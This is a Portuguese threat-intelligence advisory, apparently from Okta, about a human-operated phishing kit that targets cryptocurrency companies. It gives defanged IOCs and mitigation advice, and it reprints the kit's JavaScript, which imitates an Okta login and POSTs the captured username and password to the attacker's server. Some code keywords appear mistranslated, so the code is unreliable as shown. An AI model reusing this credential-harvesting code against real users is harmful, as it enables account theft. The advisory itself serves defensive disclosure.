Kit de phishing operado por humanos tem como alvo empresas de criptomoedas

Resumo Executivo

Em maio de 2025, a equipe de Inteligência de Ameaças da Okta observou um cluster de atividade relacionada a phishing atualmente não atribuído (O-UNC-020) que tem como alvo principalmente organizações que operam no espaço de criptomoedas.

O-UNC-020 foi observado pela primeira vez em outubro de 2024, visando organizações que operam em criptomoedas, e-mail marketing, automação de marketing, automação de vendas e CRM.

Este aviso detalha as Táticas, Técnicas e Procedimentos (TTPs) observados e fornece Indicadores de Comprometimento (IOCs) relevantes associados a esta ameaça ativa.

A campanha deve ser de particular interesse para qualquer organização que protege o acesso a aplicativos baseados em navegador usando senha como autenticador primário e notificações push como segundo fator. O kit de phishing usado pelo atacante - que analisamos abaixo - serve para capturar e enviar o nome de usuário e a senha de um alvo para um servidor controlado pelo atacante. O usuário alvo recebe uma página projetada para parecer que conteúdo adicional está carregando, enquanto os operadores humanos do kit de phishing inserem as credenciais de seu próprio navegador para acionar uma notificação push.

Estas informações são fornecidas para fins informativos e de inteligência, para permitir que as organizações compreendam e mitiguem os riscos representados por esta campanha.

An atlise de ameaças

A análise da campanha de maio de 2025 identificou a seguinte infraestrutura usada para hospedar as páginas de phishing maliciosas, que apresentam um Okta Sign-In Widget fraudulento:

• 91.212.166[.]185 - AS198953 - Proton66 OOO
• 196.251.84[.]3 - AS401120 - cheapy.host LLC
• 193.24.123[.]162 - AS200593 - PROSPERO OOO

E usou os seguintes padrões de domínio:

• <customer>-sso.com
• <customer>-okta.com
• login-<customer>.com
• mail-.com<customer>

Atividade de roubo da conta

Após um comprometimento bem-sucedido das credenciais do usuário, os agentes de ameaças foram observados tentando autenticar a partir dos seguintes endereços IP:

• 154.221.58[.]232 - AS202656 - XServerCloud
• 213.209.137[.]210 - AS62240 - Clouvider
• 46.232.37[.]58 - AS62240 - Clouvider

Durante as tentativas de autenticação, o agente de ameaças foi observado usando endereços IP associados ao Proxyline.net, um grande provedor de proxy de data center russo. Este serviço oferece uma extensa rede de servidores proxy HTTP e SOCKS IPv4 e IPv6 de alta velocidade, que podem ser usados para rotear o tráfego por meio de vários locais globais. ProxyLine anuncia uma política de não registro e aceita pagamentos em criptomoedas. Esses recursos o tornam particularmente atraente para criminosos cibernéticos, agentes patrocinados pelo estado e outras entidades maliciosas que buscam manter o anonimato e evitar a detecção.

Características do kit de phishing

• O kit de phishing apresenta um processo de login de duas etapas: primeiro pedindo um Nome de Usuário (ID de entrada usernameInput) e depois, após um atraso simulado, uma Senha (ID de entrada passwordInput).
• O nome de usuário e a senha coletados, juntamente com um csrf_token estático (que faz parte da imitação), são enviados por meio de uma solicitação AJAX POST para um caminho relativo API/v1/login no servidor de phishing.
• Depois de enviar as credenciais, a página simula um atraso de processamento (setTimeout) e tenta redirecionar o usuário para uma página chamada /oauth_await. Esta é outra página controlada pelo invasor, projetada para aumentar a ilusão de que as credenciais primárias do usuário foram inseridas com sucesso.
• O código javascript, que é executado diretamente no navegador da web do usuário e o redirecionamento para a página oauth_await, indica a coleta de credenciais em tempo real por um operador humano. Os invasores inserem as credenciais coletadas no serviço Okta de produção do alvo, numa tentativa de acionar uma notificação push. Um usuário que assume ter inserido a senha correta pode aceitar a notificação push gerada pelo invasor sem verificar o contexto exibido na mensagem.
• O redirect_uri no URL gerado dinamicamente (<org>.okta.com%2Fenduser%2Fcallback) é legítimo, e o invasor pode tentar redirecionar o usuário por meio deste link após roubar suas credenciais.

<script>

if (!window.location.href.includes('?')) {

function generateRandomString(length) {

const charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

let result = '';

for (let i = 0; i < length; i++) {

result += charset.charAt(Math.floor(Math.random() * charset.length));

}

return result;

}

const clientId = sessionStorage.getItem('client_id') || 'okta.' + generateRandomString(32);

sessionStorage.setItem('client_id', clientId);

const codeChallenge = sessionStorage.getItem('code_challenge') || generateRandomString(43);

sessionStorage.setItem('code_challenge', codeChallenge);

const nonce = sessionStorage.getItem('nonce') || generateRandomString(22);

sessionStorage.setItem('nonce', nonce);

const state = sessionStorage.getItem('state') || generateRandomString(40);

sessionStorage.setItem('state', state);

let currentPage = window.location.pathname;

currentPage = currentPage.replace(/\.php$/, '');

const newUrl = `${currentPage}?

client_id=${clientId}&code_challenge=${codeChallenge}&code_challenge_method=S256&nonce=
${nonce}&redirect_uri=

https%3A%2F%2Fredacted.okta.com%2Fenduser%2Fcallback&response_type=
code&state=${state}&scope=openid%20

profile%20email%20okta.users.read.self%20okta.users.manage.self
%20okta.internal.enduser.read%20okta.internal.endus

er.manage%20okta.enduser.painel.read%20okta.enduser.painel.manage
%20okta.myAccount.sessões.manage`

;

window.location.href = newUrl;

}

$(document).ready(function() {

$('#usernameInput').keyup(function() {

se ($(this).val() == '') {

$("#inputDispaly").show();

$("#roleAlertDisplay").show();

} else {

$("#inputDispaly").hide();

}

});

$('#passwordInput').keyup(function() {

se ($(this).val() == '') {

$("#displayPasswordErrorText").show();

$("#passwordContainerError").show();

} else {

$("#displayPasswordErrorText").hide();

}

});

$('#username-saving').on('submit', function(event) {

event.preventDefault();

});

$('#senha-saving').on('submit', function(event) {

event.preventDefault();

});

$('#usernameInput').on('keyup', function(event) {

if (event.key === 'Enter' || event.keyCode === 13) {

event.preventDefault();

$('#next_username_button').click();

}

});

$('#passwordInput').on('keyup', function(event) {

if (event.key === 'Enter' || event.keyCode === 13) {

event.preventDefault();

$('#next_pass_button').click();

}

});

$('.password-toggle').on('click', function() {

const $passwordInput = $('#passwordInput');

const $showIcon = $('.botão-show');

const $hideIcon = $('.botão-hide');

if ($passwordInput.attr('type') === 'senha') {

$passwordInput.attr('type', 'text');

$showIcon.hide();

$hideIcon.show();

} else {

$passwordInput.attr('type', 'senha');

showIcon.show();

$hideIcon.hide();

}

});

$('#input36').on('click', function() {

const isChecked = $(this).prop('checked');

if (isChecked) {

$('#input36_check').addClass('checked');

} else {

$('#input36_check').removeClass('checked');

}

});

const loginUsername = $("#next_username_button");

const loginPassword = $("#next_pass_button");

loginUsername.click(function() {

const username = $('#usernameInput').val();

$("#inputDispaly").hide();

$("#roleAlertDisplay").hide();

if (username == '') {

$("#inputDispaly").show();

$("#roleAlertDisplay").show();

return;

}

loginUsername.attr('disabled', true);

loginUsername.addClass('link-botão-disabled btn-disabled');

$("#username-saving").addClass('o-form-saving');

setTimeout( function (){

$(".okta-username-section").hide();

$(".okta-senha-section").show();

$("#insertUsernameValue").text(username);

$('#passwordInput').focus();

return

}, 1500);

});

loginPassword.click(function() {

const senha = $('#passwordInput').val();

$("#displayPasswordErrorText").hide();

$("#passwordContainerError").hide();

if (senha == '') {

$("#displayPasswordErrorText").show();

$("#passwordContainerError").show();

return;

}

loginPassword.attr('disabled', true);

loginPassword.addClass('link-botão-disabled btn-disabled');

$("#password-saving").addClass('o-form-saving');

const payload = {

username: $('#usernameInput').val(),

senha: $('#passwordInput').val(),

csrf_token: $("input[name=csrf_token]").val(),

page: 'login'

};

$.ajax({

url: 'api/v1/login',

type: 'POST',

data: payload,

success: function(response) {

setTimeout( function (){

window.location.href = "oauth_await";

return

}, 1500);

},

error: function(err) {

console.log('Erro ao enviar dados:', err);

alert('Error, please refresh the page');

}

});

});

});

</script>

Resposta a Ameaças

O que estamos fazendo
Estamos ativamente engajados nas seguintes atividades para mitigar esta ameaça:

• Monitoramento contínuo de domínios de phishing e infraestrutura recém-registrados associados a esta campanha.
• Apresentar proativamente relat rios de abuso aos registradores e provedores de hospedagem relevantes para iniciar solicita es de remo o para sites maliciosos identificados.
• Fornecer orientação e assistência às organizações para aprimorar a segurança de seus ambientes Okta e investigar qualquer atividade suspeita relacionada a contas potencialmente comprometidas.
• Publicando atualizações para este aviso à medida que observamos mais atividades.

Controles Protetivos

Recomendações para clientes:

• Registre os usuários em autenticadores fortes, como Okta FastPass, FIDO2 WebAuthn e cartões inteligentes, e imponha resistência ao phishing na política. Se alguma exceção for feita para as notificações push do Okta Verify, recomendamos impor desafios numéricos para todas as tentativas de login ou para tentativas de login de alto risco.
• As políticas de autenticação Okta também podem ser usadas para restringir o acesso a contas de usuário com base em uma variedade de pré-requisitos configuráveis pelo cliente. Recomendamos que os administradores restrinjam o acesso a aplicativos confidenciais a dispositivos que são gerenciados por ferramentas de Gerenciamento de Endpoint e protegidos por ferramentas de segurança de endpoint. Para acesso a aplicativos menos confidenciais, exija dispositivos registrados (usando Okta FastPass) que exibam indicadores de higiene básica.
• Negue ou exija maior garantia para solicitações de redes raramente usadas. Com o Okta Network Zones, o acesso pode ser controlado por local, ASN (Número do Sistema Autônomo), IP e tipo de IP (que pode identificar proxies de anonimato conhecidos).
• As avaliações de comportamento e risco da Okta podem ser usadas para identificar solicitações de acesso a aplicativos que se desviam dos padrões de atividade do usuário estabelecidos anteriormente. As políticas podem ser configuradas para aumentar ou negar solicitações usando este contexto.
• Treine os usuários para identificar indicadores de e-mails suspeitos, sites de phishing e técnicas comuns de engenharia social usadas por invasores. Facilite para os usuários relatarem problemas potenciais, configurando as Notificações para o Usuário Final e o Relatório de Atividades Suspeitas.
• Documente, divulgue e siga um processo padronizado para validar a identidade de usuários remotos que entram em contato com o pessoal de suporte de TI e vice-versa.
• Adote uma abordagem de "Privilégios Zero Permanentes" para acesso administrativo. Atribua aos administradores Funções de Administrador Personalizadas com as permissões mínimas necessárias para as tarefas diárias, e exija dupla autorização para acesso JIT (just-in-time) a funções mais privilegiadas.
• Aplique o IP Session Binding a todos os apps administrativos para impedir a reprodução de sessões administrativas roubadas.
• Habilite Ações Protegidas para forçar a reautenticação sempre que um usuário administrativo tentar executar ações confidenciais.

Observando e respondendo à infraestrutura de phishing:

• Analise os registros de aplicativos (registros do Okta, proxies da web, sistemas de e-mail, servidores DNS, firewalls) em busca de qualquer evidência de comunicação com esses domínios suspeitos.
• Monitore os domínios regularmente para ver se o conteúdo muda.
• Se o conteúdo hospedado no domínio violar direitos autorais ou marcas legais, considere fornecer evidências e emitir uma solicitação de remoção com o registrador de domínio e/ou provedor de hospedagem na web.

Apêndice A: Indicadores de Comprometimento

Esta é uma investigação em andamento, e IOCs adicionais podem ser identificados à medida que a campanha evolui. Aconselha-se às organizações que permaneçam vigilantes e implementem as estratégias de mitigação recomendadas. Abaixo estão os IOCs observados.